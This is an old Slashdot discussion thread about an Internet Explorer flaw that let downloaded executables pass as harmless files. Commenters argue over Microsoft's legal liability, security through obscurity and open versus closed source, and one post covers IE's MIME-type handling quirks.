      The software they keep private, the software they won't let you view the source code for, the software that they have used to create a global monopoly.

      They have a LOT of nerve! huh!?

      Don't like it? Donate to the EFF! :)

    4. Re:Negligence? by aozilla · · Score: 2

      Try to get a basic understanding of the vulnerability, first.

      Any way to skip all dialogs, ie. to run an application without ANY dialog with this vulnerability has NOT been found. In all variations of the exploit there is always the normal file download dialog, but the following Security Warning dialog is skipped.

      This sensationalized story is nothing more than Microsoft-bashing.

      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
    5. Re:Negligence? by Elwood+P+Dowd · · Score: 2

      Yes. But there are laws that limit the power of these license agreements. Iduno what MS has cooked up in their EULA, but stuff like the "No warranty of suitability for any particular purpose" stuff is often illegal, and the same with the limitation of damages to the cost of the software.

      So it would depend what jurisdiction you're in (in microsoft's case, everywhere) and what your real damages were.

      --

      There are no trails. There are no trees out here.
    6. Re:Negligence? by dummkopf · · Score: 1

      maybe incompetence instead of negligence???

    7. Re:Negligence? by RedWolves2 · · Score: 1

      How can they be sued for negligence? Until now they were the only ones that knew about it. They are in the testing phase of there patch right know. Basically you have no case.

      The problem here is that some journalist got wind of a patch to soon and decided to write a story about it. I think that the media needs to think about what they write in terms of software security.

      I mean even since Sept. 11 all media outlets are rethinking what is and what isn't safe to release to the public in the name of national security.

      What they are overlooking is that security holes in software is also a breach in national security and they need to step back and decide if what they are releasing is appropiate. The argument could be made for this particular article either way.

    8. Re:Negligence? by xah · · Score: 5, Interesting
      IANAL, I'm a law student. Right now, Microsoft could not be sued for negligence, because no one has been hurt by their failure to exercise due care.

      As soon as trade secrets are stolen, or hard drives are trashed, or economic harm takes place, however, a negligence action may arise.

      The first barrier is the economic loss rule. If the contract damages are higher than the tort (negligence) damages, there is a defense to tort. In English, there's no lawsuit unless the bug costs you more than buying your copy of Windows cost you.

      The next barrier is the contractual disclaimer, the "EULA" as Microsoft calls it. The waters here are less well charted. To be realistic, it depends on how severe the harm actually is.

      The wild card is intentional harm. If Microsoft in fact intentionally included this bug, knowing of the danger, for the purpose of advancing their business enterprise, legal actions could arise that are not precluded by the EULA. This would be difficult to prove, however.

      I think /.'s knee jerk assessment of "death of the Internet, film at 11," is premature, however. I hope I'm not wrong, but I think the bug won't prove that severe. Just browse at "medium security" in IE, for example, right?

      If I were a lawyer, I would want to sue Microsoft. They have $30 billion in cash or so sitting in bank accounts. It would be more tempting for them to settle claims than it would be for an Enron, for example.

      Don't worry about the legal angle. If the harm is severe enough, justice will be done.

      --
      I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
    9. Re:Negligence? by Kwil · · Score: 2

      The key point though, is that the normal file download dialog can be spoofed so that it calls the file something normally innocuous.

      So when some user clicks on a link that suppposedly downloads say a PDF file, the download dialog only pops up "MonthlyReport.pdf" or whatever it is they expect. Should the user click "Open" at that point, they're fucked.

      So I'd hardly call it Microsoft-bashing, as this is a *serious* flaw.

      --

      That Jesus Christ guy is getting some terrible lag... it took him 3 days to respawn! -NJ CoolBreeze

    10. Re:Negligence? by nihilogos · · Score: 2

      IANAFL but in Australia, at least, the consumer has a right to reasonable guarantees irrespective of any "no warranty" claims on the product. Whether this is covered is a question for someone else.

      --
      :wq
    11. Re:Negligence? by EulerX07 · · Score: 1

      No it is not. How many time in the last few days have you clicked the OPEN button instead of saving the file? Well every one of those time someone could have "sent you up the bomb".

      There is way more microsoft apologistism going on than there is unjustified bashing. I for one never doubted that the name of the file that IE showed me in the dialog box could be wrong, because I assumed it was a system message and that the name displayed was the name that was gonna be used on my local system, which it is not necessarily.

    12. Re:Negligence? by jmv · · Score: 2

      In English, there's no lawsuit unless the bug costs you more than buying your copy of Windows cost you.

      So I guess MS is just preparing their defense by increasing the price of Windows...

    13. Re:Negligence? by MrResistor · · Score: 2
      What they are overlooking is that security holes in software is also a breach in national security and they need to step back and decide if what they are releasing is appropiate.

      If an MSIE security hole is able expose information vital to national security then our national security is a joke, and any appeal which attempts to take it seriously is fatally flawed. Last I heard the NSA certified MS products as secure only if they weren't connected to a network. BTW, if you know where the Windows 2000 Security Recomendations are, please let me know.

      On a side note, I was mildly disturbed to find that the NSA has a kid's page, but it's actually pretty cool. If only my school had access to something like it when they put me in their travesty of a gifted program, I might have even stayed in it...

      --
      Under capitalism man exploits man. Under communism it's the other way around.
    14. Re:Negligence? by aozilla · · Score: 1, Troll

      How many time in the last few days have you clicked the OPEN button instead of saving the file?

      Considering that I use mozilla on linux, I'd say never.

      Well every one of those time someone could have "sent you up the bomb".

      If you go to untrusted websites and blindly open files, sure. But I've never done that, even when I was using Windows.

      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
    15. Re:Negligence? by Lemmy+Caution · · Score: 2

      What is the EFF going to do about it? Do you mean the FSF? What are *they* going to do about it? Don't you mean the DOJ? What are **they** going to do about it?

    16. Re:Negligence? by Anonymous Coward · · Score: 0

      Why are u mildly disturbed to find a NSA kids page? You do know those are designed encrypted with codes that genius kids can see ;) The kids page is actually a recruitment page for code breakers.

    17. Re:Negligence? by VAXman · · Score: 2

      Sure -- and who are you going to sue for September 11th? Boeing, or United & American Arilines?

    18. Re:Negligence? by pongo000 · · Score: 2
      But there are laws that limit the power of these license agreements.

      One such legal concept is known as an implied warranty. In some states, vendors cannot legally force consumers to waive their rights to certain implied warranties, regardless of what the legal eagles spout off. There are different kinds of implied warranties, such as the warranty that a particular product will adequately perform as advertised, that a particular product is free from defect, etc.

      Many times, enforcement of implied warranties involve legal action, the cost of which generally outweighs the damages sought. It's a consumer law that's not very consumer-friendly.

    19. Re:Negligence? by ninewands · · Score: 2

      Actually, no ...

      The problem here arises from the fact that Windows allows more than one '.' in a filename, but will only display one. Therefore, a malicious webmaster can name a file "foo.pdf.exe" and Windows Open/Save dialog will only display foo.pdf.

      As for the fix, it's a 2-step process ... 1) set IE to treat the entire "Internet Zone" with its "Restricted sites" security setting, and 2) do NOT open any files online unless you completely trust the website you are browsing ... and how many of those are there?

      As for potential Microsoft liability, one might be able to make a case that Microsoft was grossly negligent by trying to cover up this hole ... in which case, the case becomes quasi-criminal and disclaimers in the EULA go out the window ... but gross negligence is tough to prove. It requires a showing of wanton, willful neglect and a complete disregard for the rights of the victim ... errrrmmmm .... sorta like the actions of ... errrrmmmm ... an abusive monopoly ... oops, might not be so hard after all ...

      My personal fix for problems with IE is a 5 CD set of Debian woody and Mozilla ...

    20. Re:Negligence? by Anonymous Coward · · Score: 0

      The short answer: You can try to sue Microsoft, but they have more lawyers than you do, and you actually have to make a case before a judge.

      The particular "exploit" that this thread is about is that IE asks you what you want to do with the file you are downloading before asking the web server to download it. Once the request is made to download the file, the web browser uses the information stored within the headers to name and dispatch the file.

      So, one could put up a file on a site, link to it as readme.txt. The readme.txt file, upon download (i.e. in the HTTP headers sent by the server) would actually be readme.exe, with an appropriate MIME type. IE then saves readme.exe and attempts to execute it (if you told it to open the "readme.txt" file. According to the source in the linked article, available here, this exploit works differently on different browsers, however, if you never open a file directly, but rather, choose "Save As..." you will never have a problem. The Save As dialogue will tell you what the file should really be named, and you can cancel it at this point without continuing to download it if it was not the type you expected.

      So, no, you can't sue Microsoft because someone exploits someone else using Microsoft's product. And if you did sue, your odds of winning would be less than odds of winning the lottery. This isn't a security hole. Whenever you open any file type on the internet, you implicitly trust the person serving it to you to not make it harmful. My recommendation is to buy an anti-virus and stop wasting people's time asking if you can sue about it. Or, perhaps hit Save As instead of Open if you don't trust the site.

      If you engineer idiot-proof software, lo and behold, the world will engineer better idiots. -Mike

    21. Re:Negligence? by xah · · Score: 1
      In case you missed the other discussion,

      DO NOT TAKE LEGAL ADVICE FROM ANY LAW STUDENT.

      If you have a legal problem or a legal case, or believe you have one, talk to a lawyer. Don't use anything that I say as advice.

      --
      I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
    22. Re:Negligence? by fishebulb · · Score: 1

      actually the FFA would be better, since they were negligent in saying knives are allowed on the plain. But yes those airlines could be at fault for being complete morons about a lot of stuff. just like any other company that ignores reality.

    23. Re:Negligence? by fishebulb · · Score: 1

      unfortunately there is a problem with knowing if you could win. Do you realize the unholy army lawyers youd need. The concentrated evil would be frightening, we're talking truly vicious people and thousands of them to win

    24. Re:Negligence? by xah · · Score: 1
      Do not take anything I say as legal advice. I'm only a law student.

      If you need legal advice, consult a lawyer.

      --
      I am not a lawyer. Do not take my words as legal advice. If you need legal advice, consult an attorney.
    25. Re:Negligence? by Old+Wolf · · Score: 2

      Unless, of course, you enable displaying of extensions in IE (which you are foolish not to)

    26. Re:Negligence? by Anonymous Coward · · Score: 0

      Mozilla has an "open" feature, and people use it. Why are you so sure that Mozilla is bug free? Did you audit the source yourself?

    27. Re:Negligence? by MrResistor · · Score: 2
      The kids page is actually a recruitment page for code breakers.

      Yet another reason why I wish this had been available when I was a kid...

      --
      Under capitalism man exploits man. Under communism it's the other way around.
    28. Re:Negligence? by jquirke · · Score: 0, Troll

      No, we can't sue them, but we can charge them with hate crimes against stupid people (ie. people who use Windows :-P)

    29. Re:Negligence? by Anonymous Coward · · Score: 0

      "actually the FFA would be better, since they were negligent in saying knives are allowed on the plain."

      Hey, I used to be a Future Farmer of America and the fact that we approve of the use of knives or even guns on the plain does not make us negligent. We need those implements to protect the crops.

    30. Re:Negligence? by cthugha · · Score: 2
      The first barrier is the economic loss rule. If the contract damages are higher than the tort (negligence) damages, there is a defense to tort. In English, there's no lawsuit unless the bug costs you more than buying your copy of Windows cost you.

      I am a law student who's just finished first-year contract and tort (in Australia), and I have no idea how you came up with this one. AFAIK, the consideration you paid for a contract is not relevant when assessing whether the other party is liable for breaching or negligently performing their obligations; if they wrong you, they pay your loss. Perhaps, as I have alluded, this is a jurisdictional thing? I would appreciate a clarification.

    31. Re:Negligence? by aozilla · · Score: 2

      I wasn't aware that Mozilla had an "open" feature. I've certainly never used it. How would that "open" feature work, anyway? How would mozilla know what application to launch, for instance?

      All I know is when I click on a pdf, my only option is "save". I assumed (presumably wrongly) that all mime types would behave similarly.

      --
      ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
    32. Re:Negligence? by cs668 · · Score: 1

      Do implied warranties apply to software? I have always been confused about this, but I assume that they do not apply since you are not buying the software, just licensing it.

      IMHO THAT BITES!

    33. Re:Negligence? by hearingaid · · Score: 2

      Just because somebody claims no warranty, doesn't let them off the hook in cases of actual negligence.

      It's a standard lawyer tactic to discourage lawsuits: but courts regularly ignore it.

      --

      my old sig used to be funny, but then slashcode ate it and now it's not funny anymore

    34. Re:Negligence? by hearingaid · · Score: 2

      I believe that's an American doctrine to prevent people from suing in both contract and tort to get even more money.

      You'd have to be willing to sue for breach of contract in the alternative.

      The Real World (i.e. non-American common law countries) avoids this problem by simply requiring you to sue only once for one incident.

      --

      my old sig used to be funny, but then slashcode ate it and now it's not funny anymore

    35. Re:Negligence? by g1zmo · · Score: 1

      From what I understand, the license agreement that you click through is covered by contract law, not consumer protection law, which is much less comsumer-oriented. This comes from the fact that we did not purchase the product itself, but a license to use the product.

      Microsoft's (and every other software company's) license states that they are not responsible for *any* data loss, corruption, theft, etc. due to the use of their product. Basically they use the same "merchantability" clause as the gpl.

      Maybe this could be tested in court, but so far, this is how it stands.

      --
      I have found there are just two ways to go.
      It all comes down to livin' fast or dyin' slow.
      -REK, Jr.
    36. Re:Negligence? by Anonymous Coward · · Score: 0

      The coded message is:

      We get millions of dollars that we don't have to account for. We get all the latest computer hardware. Take lots of Math classes and you can work here too!

      Posting anonymous because they are watching

    37. Re:Negligence? by Anonymous Coward · · Score: 0

      It continues to amaze me that MS products are being used in shops more and more every day where security is even remotely an issue. Not to mention any federal government agencies. I'm nearly convinced that there is no hope and that most IT departments are led by brainwashed invalids who should be fired for incompetence. In fact any IT manager who continues to put out MS products on corporate desktops, knowing the track record in the "non-security area", should be brought up on criminal neglect charges. They should have to pay damages for every virus that enters their company through one of the many open doors in the MS software that are left wide open without concern.

      I realize MCSEs are a dime-a-dozen but I have to think at least *some* of them have the capacity to be retrained and put to better use than chasing the rabbit around the dog track..

  7. the consequence? by Anonymous Coward · · Score: 0
    So, as a consequence we should be able to download every single file on every currently operating computer at Microsoft Corporation, because they all use IE?

    Hmmm. Wonder where Bill's .plan file is?

    1. Re:the consequence? by Anonymous Coward · · Score: 0

      $cat `which .plan`
      1. Build the largest wooden plane and call it the Oak Goat.
      2. Next time Steve has to wear the rubber underpants.
      3. Note to self: they know who I am and they know what I did.
      4. Get the patent on base 6.
      5. Ensure our EULA forces people to use base 6.
      6.^H^H 10. Doh, learn base 6!
      11. Release VI 2004 as a part of the Office Suite. (convert VIM into VB code and make it buggy.

    2. Re:the consequence? by Anonymous Coward · · Score: 0

      Wouldn't "VI 2004" be "X 13140" under base 6?

  8. And this would be different than wftpd How? by glrotate · · Score: 0, Offtopic

    lets not get carried away here.

    1. Re:And this would be different than wftpd How? by wshelby · · Score: 2, Insightful

      I agree When ever you hear about a microsoft exploit you linux freaks are all over it but when a linux hole is opened most likely by the same wannabe h4z0r3s no body says anything the just patch and move on, maybe like the new Apache exploit which allows file system access.

      ( NO NOT APACHE THESE THINGS ONLY HAPPEN TO IIS )

      I now return you to your regularly scheduled Windows bashing.

    2. Re:And this would be different than wftpd How? by Anonymous Coward · · Score: 0

      Maybe people complain because Microsoft seems to have a "I'll fix it later, after I add new features!" attitude to major security holes whereas many UNIX/Linux/etc developers take security holes more seriously, and, the Microsoft bashing due to reluctance to fix major security holes spawns general Microsoft bashing. I'm not saying that this is fact, but from what I've seen, it seems to be true.

    3. Re:And this would be different than wftpd How? by GiMP · · Score: 2

      I would like to mention that

      A) those programs are not bundled with the Operating System; only running on some machines.

      B) there have been multiple wuftp exploits, anyone sane wouldn't run it.

      C) the programs you specified are open source, they are usually patched very quickly, rather then brushed off as Microsoft often does. Also, since they are open source if there is no patch available, you can easily work-around the bug or disable the faulty feature.

      If IE was open source, this problem would be major.. but it would be fixable; currently, as it is closed source.. it is a continuing major security hole

  9. Catch-22 by Kellog · · Score: 0, Troll

    If I disable downloads, how do I download the patch?

    Oh yeah, install linux!

    mk

    "Memes do not exist! Tell everyone you know."

  10. Re:Now that this particular cat is out of the bag. by stew77 · · Score: 1

    Considering that a lot of users never update their browser at all (I have seen quite some people using the IE 4.0 that came with Win98), even an immediate release of a bugfix will still not undo the danger of having that security hole in first place.

  11. Two and a half YEARS? by JScarpace · · Score: 2, Flamebait

    If this bug in IE has really been around for two and a half years, how is it that no one has stumbled on to it until now? Could it be that (GASP!) security through obscurity actually worked in this case?

    1. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      If this bug in IE has really been around for two and a half years, how is it that no one has stumbled on to it until now?

      Has it been in IE for two and a half years? Are you sure no one has noticed it?

      Maybe this was handled properly at first and broke. Maybe someone found it and didn't tell you.

      Hmmm...

    2. Re:Two and a half YEARS? by J.+J.+Ramsey · · Score: 5, Informative

      "If this bug in IE has really been around for two and a half years, how is it that no one has stumbled on to it until now?"

      You are making the classic mistake of assuming that the first one to publicize the vulnerability is the first one to have found it. A malicious cracker could have known about the problem long before it was made public and exploited it silently.

      That classic mistake is what is wrong with "security by obscurity." There is no guarantee that what is obscure to the general public is obscure to the bad guys.

    3. Re:Two and a half YEARS? by Suppafly · · Score: 1

      well it could be that, or it could be that its not actually as big a deal as certain /. editors and websites grasping for content would have you believe.

    4. Re:Two and a half YEARS? by huberj · · Score: 1

      Actually, it didn't. See people know about it now, and there are millions of vulnerable browsers out there just waiting to be taken advantage of.

    5. Re:Two and a half YEARS? by Chris+Johnson · · Score: 2

      Not any more!

    6. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      See Bind.

      Bugs in particular codebases turn up YEARS after initial release.

      Same with any piece of software. That's why bugtesting exists; it's hard to just look at a section of code and suddenly say 'oh look, this will cause a blah blah blah if someone blah blah blah's with a parameter of blah'.

    7. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      And there is another classic mistake that "many eyes make all bugs shallow." No one I know goes through all the source code they download with a fine comb looking for bugs. Hardly anyone _does_ do that either, unless they want to modify the code in some way. Then they stumble onto the bug by chance.

      Reality says this: It is a bitch to reverse engineer a program. I believe that is very much common sense. With source code there is no reverse engineering. Simply download and look for exploits.

      Bad guys releasing info on the exploit has _nothing_ to do with obscurity. If bad guys know about a bug and don't tell anyone in open source software, the bug is still there.

    8. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      This was never really handled properly. IE's had MIME-type interpretation bugs before, and it will probably happen to them in the future.

      (This is very similar to the fixed bug which was exploited by nimda, from the sound of it.)

    9. Re:Two and a half YEARS? by psocccer · · Score: 5, Interesting

      Microsoft actually has a KB article about this, and it is intentional. Apparently, they don't believe a web developer is competent enough to handle mime types, IE has always tried to glean information from the file, be it by the extension or otherwise, to determine what it should think the file type is. At work especially I have been bitten by this "feature" many times.

      The most irritating aspect of it is that you simply can't get around it. For example, we have a web-based flyer/catalog generation program at the office. The advertising department enters records such as item code, part number, color, size, etc, some text, and attaches items to the record. Hardware distribution (like shovels/rakes/nails/etc) has extremely low margins, so purchasing something like Quark Express or another database driven tool is out of the question. Well, we found Adobe Pagemaker to be sufficient, and lo and behold it supports importing tagged text. So from our database, they select items and it can export SGML-ish text to be imported into Pagemaker.

      Now here comes the rub. Pagemaker wants the files to be .txt for finding easily in the import box, but if you send IE a content type of text/plain it will display it. No big deal, just save right? Well, IE also believes since it got < and > tags that it MUST be HTML, despite the fact that I'm saying it's plain text, so it's going to add the proper html header and footer along with content encoding tags. Pagemaker doesn't like that. And to be even more irritating, is that we'd like to be able to just have the save box pop up. Well, normal browsers that handle things standardly will accept the content type, and if they don't understand the content type they will usually pop up a "save as" box. OK, so now we pass back content type of application/x-hdi-export, surely no browser knows of this, and Netscape/Moz/Opera handle this correctly. But we also pass a default filename, in the Content-disposition part, with a name ending in .txt. So what's IE do? Display it in the window, still thinking it's HTML, all because of the extension.

      So what it comes down to, is I also have to mangle the output name be making it .txt_ so that IE will not try and read it, along with passing it a bad content type, otherwise if it's application/octet-stream or some such, it will STILL RENDER IT IN THE DAMN WINDOW because for "common" types such as text/plain or application/octet stream, it examines the content of the file.

      And for those of you who thing "why not right click -> save as", well the generation needs several arguments, such as sorting, template name, etc, so it's a form, and you can't click the button and tell a form you want to save the download.

      This isn't the only time I've had a problem, I don't want to even get in to how IE badly handle dynamically generated PDF's, how since 5.5 it ignores the settings to not embed PDF since that's the only work-around, and how 5.5 also asks the "open here/save" question TWICE when passing it some file types.

      Overall, they may tout it as a feature, but if they'd just follow the damn standard like everyone else I wouldn't have to waste so much time finding workarounds for their "features"

    10. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      >5.5 also asks the "open here/save" question TWICE when passing it some file types.

      and three times, for me occasionally.

    11. Re:Two and a half YEARS? by fishebulb · · Score: 1

      obviousely since you dont know anyone that does, there must not be anyone then.

    12. Re:Two and a half YEARS? by B1ood · · Score: 1

      The problem you just pointed out is not restricted to software with security through obscurity though. If the Linux kernel had a bug like this that someone found but didn't report, they could do the exact same thing.

      The good thing about open source here is that as soon as it is reported, it gets fixed. We wouldn't have to wait for a company to release a fix for us.

      --
      Note to self: pasty-skinned programmers ought not stand in the Mojave desert for multiple hours. -- John Carmack
    13. Re:Two and a half YEARS? by Zog · · Score: 1

      Just to demonstrate your point, the story of a long-ago-found Solaris bug in some random service:

      There was a completely unknown security in an early version of Solaris which allowed remote root compromise, etc. It was used with class (VERY sparingly), as to avoid detection. Eventually the guy got too comfortable with it, and The Admins That Be noticed there was a lot of traffic going to that port for no reason, and it was known to be secure, so they took a look into it. Eventually, after doing a full audit, they found the bug that the guy had been using all along.

      The hole had been very obscure, but security was out the window as soon as one skilled [h/cr]acker found it. Whether or not he made it widely known didn't matter - there was a hole.

    14. Re:Two and a half YEARS? by discogravy · · Score: 3, Interesting

      If this bug in IE has really been around for two and a half years, how is it that no one has stumbled on to it until now? Could it be that (GASP!) security through obscurity actually worked in this case?

      The nimda virus used a variation of this "Content-type/TLE" switcheroo.

    15. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      You are making the classic mistake of assuming that the first one to publicize the vulnerability is the first one to have found it. A malicious cracker could have known about the problem long before it was made public and exploited it silently.

      The same is true of vulnerabilities in bind, sendmail, wuftpd, etc. that have been around for *many* years but have only lately been discovered. Presumably there are still more possible exploits in them that perhaps are being used maliciously right now, but have not been discovered by the general public yet.

      But in a way I suppose this reinforces your point -- but here the problem is not that the code is closed, but that poor design makes it difficult to see exactly what its "side effects" can be. A poor design can cause obscurity as much as closed development can.

    16. Re:Two and a half YEARS? by hacker · · Score: 1
      This isn't the only time I've had a problem, I don't want to even get in to how IE badly handle dynamically generated PDF's, how since 5.5 it ignores the settings to not embed PDF since that's the only work-around, and how 5.5 also asks the "open here/save" question TWICE when passing it some file types.
      I have one very basic question: WHY THE HELL ARE YOU STILL USING IT THEN??!

      There are hundreds of alternatives out there for you to use both in the OS and application space, which WILL do what you want, and if it doesn't, there are even some alternatives that give you the full source code so you can make it do what you want anyway.

    17. Re:Two and a half YEARS? by raynet · · Score: 1

      Actually you can right-click a form submit button and save as from there. I use this often to save PDF documents after some long EULA page that you must agree with. If I don't save the file IE loads PDF-plugin and shows the damn document.

      --
      - Raynet --> .
    18. Re:Two and a half YEARS? by dachshund · · Score: 1
      Bad guys releasing info on the exploit has _nothing_ to do with obscurity. If bad guys know about a bug and don't tell anyone in open source software, the bug is still there.

      An airplane designer might not notice some very unlikely disaster waiting to happen, simply by browsing the blueprints. He/she does have a good chance of noticing a messy or dangerous design, such as electric wires running through the fuel tanks, however.

      Security may not be the first thing you think about when designing a web browser, but it's right up there. IE should have been built from ground up around a handful of simple security precautions. The fact that this bug exists points to a bunch of bolted together security code. Had the source been open, somebody could have at least noticed this, and maybe taken some steps to correct it. Not that there isn't a lot of messy Open Source code, but in something as widely used as IE you really want to do it right.

    19. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      So you want to use IE to work with PDF's -- choosing a frying pan and fire selection of vendors.

      In any event -- Adobe is responsible for their add in (PDF viewer). I've never liked it anyway and avoid it like the plague.

    20. Re:Two and a half YEARS? by taer · · Score: 1
      This isn't the only time I've had a problem, I don't want to even get in to how IE badly handle dynamically generated PDF's, how since 5.5 it ignores the settings to not embed PDF since that's the only work-around, and how 5.5 also asks the "open here/save" question TWICE when passing it some file types.

      I had the same problem with the save twice feature in IE5.5(worked fine in 5.0). In the content disposition line, get rid of the attachment part, ie,
      Content-Disposition: filename=ks.img
      instead of
      Content-Disposition: attachment; filename=ks.img

    21. Re:Two and a half YEARS? by TWade · · Score: 1

      Not to be obtuse on the point of 'security by obscurity', but I think many of us rely on this classic mistake daily. Keys under the doormat, that back window that an be slipped open if we use just the right preasure... and most often we use a thing called a password. Absolutely secure unless broken or revealed.

    22. Re:Two and a half YEARS? by mharvey75 · · Score: 1

      Because often when writing a web-based application, you have no control over what browser your end-users will be using. And more often than not, they're going to be using IE no matter how much you might wish otherwise. I've been bitten by the Content-disposition bug many times; telling people "just stop using IE" was never an acceptable solution.

    23. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      Somebody _could_ notice flaws in something such as sendmail or bind also. But, my point is no one _does_ notice them. Until after a few sites have been exploited. And even then many sites go exploitable. Back in the day there was a _widely_ available CGI exploit that let anyone run any program on *ix machines. After a good 3-4 years of having the exploit released as publically as possible (besides having NBC or CNN do a report on it) many sites still went without fixing the flaw. Back on topic, the reason IIRC that qmail exists is because sendmail was the piece of crap it is. Instead of fixing flaw after flaw, the qmail author decided to start over. Having the source open does not make the design better. And I wager that there really is _not_ more eyes looking at the source code than there are developers working on it. In other words, the amount of developers who completely understand Mozilla is probably the same as that amount who understand IE (with taking into consideration the code size differences between the two).

    24. Re:Two and a half YEARS? by fscking_coward_2001 · · Score: 1

      I have one very basic question: WHAT WOULD MAKE YOU ASSUME A WEB DEVELOPER HAS CONTROL OVER WHAT BROWSER HIS/HER USER BASE IS USING??!


      Think about that before you go off on another pedantic rant.

    25. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0
      After a good 3-4 years of having the exploit released as publically as possible (besides having NBC or CNN do a report on it) many sites still went without fixing the flaw.

      There's a big difference between a fix that isn't applied because of bad administration, and a fix that isn't applied because it doesn't exist. A lot of people fail to update their boxes to deal with security problems, but if you actually care enough to patch the problem, Open Source projects are much more likely to have a patch available immediately after the exploit is publicized.

      Back on topic, the reason IIRC that qmail exists is because sendmail was the piece of crap it is. Instead of fixing flaw after flaw, the qmail author decided to start over.

      Access to the source lets you know if it's worth starting over in the first place. Maybe the problem isn't that bad; or maybe the bad design is restricted to one area of the code. If you can see the source and modify it, you can make the decision as to whether it's better to bolt on a patch, redesign a portion, or start over. In the case of qmail, Bernstein started over. Which makes a lot of sense, considering the age and size of sendmail.

      What you have to remember is that qmail is a relatively small program. Had it been something bigger, like like a browser, it's much more likely that somebody would have tried to salvage what code they could from the original project to avoid starting over from scratch. That might have involved forking the tree and redesigning pieces one by one, or just stripping off bits of useful stuff and using those in a new app.

      If it's a closed source project that's failing you, you always have to start over. Even if the problem is relatively minor and could be fixed by redesigning some components, or if there's a lot of useful code that you could reuse to save time.

    26. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      Suggestion: don't use unsupported (obsolete) software. Closed source does not mean patches aren't created. MS has one of the better track records of fixing bugs. Just having access to the source does not mean you will instantly gain an understanding of how it works. Sure, you can _read_ the source (unless you don't know the language). It does not mean you will be able to fix a thing wrong with it. Why else do you think there is so much reinventing the wheel in open source land? Simply because no one understands each other's code. It would in many cases take _longer_ to read and fully understand someone else's code than create your own program from scratch.

      Also, qmail is _not_ a redesign of sendmail because sendmail is _still in development_. This is what irks me with "open source is more secure" propaganda. Here sendmail is still being developed with a proven track record of design flaws and yet somehow it is secure because some mythical creature will come along and fix all it's problems. Sendmail is insecure garbage and it IS open source even if qmail is secure. True, sendmail may become completely secure. But the first time someone exploits another bug in it, then "security through openness" is too late. The damage has been done.

    27. Re:Two and a half YEARS? by Anonymous Coward · · Score: 0

      I more-or-less found it about a year ago reading mail in my Linux/Netscape combo. I got an e-mail that was obviously a virus/worm. As I was not among the 85% using IE it did nothing. I just examined the massage and concluded - IE must be stupid enough to launch embedded sounds/videos and do it by just passing the file to OS for running so that .exe/.com/.bat/.pif will run directly. I even discussed it with some of my friends. I never checked out if it really did.

      I was quite sure it ws a well-known security hole and saw no need to check/report it.

  12. No release, no foul by Walter+Bell · · Score: 0, Troll
    I know that it's no excuse, yadda yadda...

    But I have been using a Win2k box at work, with IE 6.0 on it, for several hours a day now. In fact, we needed to temporarily install 3D Studio for one of my co-workers, so I visited astalavista and many "related sites" on that box - once for the software, twice for the dongle crack. And I can say for certain that my box hasn't been cracked.

    So, as much as we want to believe that security through obscurity doesn't work, the vast majority of users have been safer because this sploit didn't show up on BUGTRAQ. Sure, Microsoft should have gotten off their collective tush and done something about it, and they should be held responsible now. But the mere notion that we are all in danger just because these bugs are kept secret is patently ridiculous.

    ~wally

    1. Re:No release, no foul by Anonymous Coward · · Score: 0

      How did this get rated insightful?

      If users do not know about the bug, then how do users learn to workaround the bug? Granted, you will have users that don't do the workaround and don't install the patch, but they're screwed anyways.

      Unless you have done a checksum on every single file on your system and compared it to a list of checksums of your files after you first installed windows, then there is no way in hell you can say for certain your system has not been cracked.

    2. Re:No release, no foul by justin.warren · · Score: 5, Interesting
      You need to work on your argumentative technique. You're using the classic "It hasn't happened to me, so it's not a problem" technique. How can you say for certain your box hasn't been cracked? Are you running advanced instrusion detection systems that would notice? What if you've been compromised by someone who really knows their stuff and are masking the effects? Methinks you're doing a great impression of a cartoon ostrich, my friend.

      Those saying security through obscurity is bad don't deny that the release of notification about the bug may enable people to exploit it. However, forewarned is forearmed, so you can start doing something about it as soon as you know, up to and including disconnecting vulnerable servers from the 'net.

      There's also the publicity aspect. Making this extremely serious bug publicly known puts pressure on the vendor to fix it. So far, they have known about it for over two years and have done nothing. That's two and a half years for anyone who might have stumbled across the bug to exploit it. They might have friends. Exploits, easter eggs and all that stuff spread quite happily before the 'net.

      Saying "What I can't see can't hurt me" is naive in the extreme.

      --
      Just because you're paranoid doesn't mean they're NOT after you.
    3. Re:No release, no foul by jamie · · Score: 1
      "So, as much as we want to believe that security through obscurity doesn't work, the vast majority of users have been safer because this sploit didn't show up on BUGTRAQ."

      Bad troll, no donut. Two exploits were posted to bugtraq on Nov. 28 and 29, though not by the vulnerability's original discoverer.

    4. Re:No release, no foul by Anonymous Coward · · Score: 0

      Hey Jamie, did you get a chance to look over my open letter to you yet?

      ~wally

    5. Re:No release, no foul by Anonymous Coward · · Score: 0

      > You're using the classic "It hasn't happened
      > to me, so it's not a problem" technique. How
      > can you say for certain your box hasn't been
      > cracked?

      And the argument is used all the time by free software advocates, as well.

      "My linux box has been up for thirteen months without a single successful hack! That proves linux to be secure!"

      Security is such an amorphous concept that it's hard to measure the impact of one philosophy over another in a single instance. We have to look at long run numbers-- IN CONTEXT, I might add-- before we get an idea of which methodology results in more security incidents than another.

      That said, there's nothing wrong with saying that:
      * An open security policy with prompt turnaround increases public trust.
      * Security through obscurity can *potentially* leave an issue unresolved while bad folks have exploits.

      Of course, there are counterarguments. Not that I care much. I run OpenBSD, I am quite glad of de Raadt and company's disclosure track record. I will stick with free software, because I'm betting that free software *will* be shown more secure in the long run (though, if I'm wrong, I'll gladly admit it).

    6. Re:No release, no foul by Chester+K · · Score: 2

      So far, they have known about it for over two years and have done nothing.

      I don't see anything in the article that states that Microsoft knew about the bug for two and a half years, but simply that it's existed since IE 5.0, which came out two and a half years ago. The headline, and the Slashdot writeup on it smells horribly like FUD-slinging.

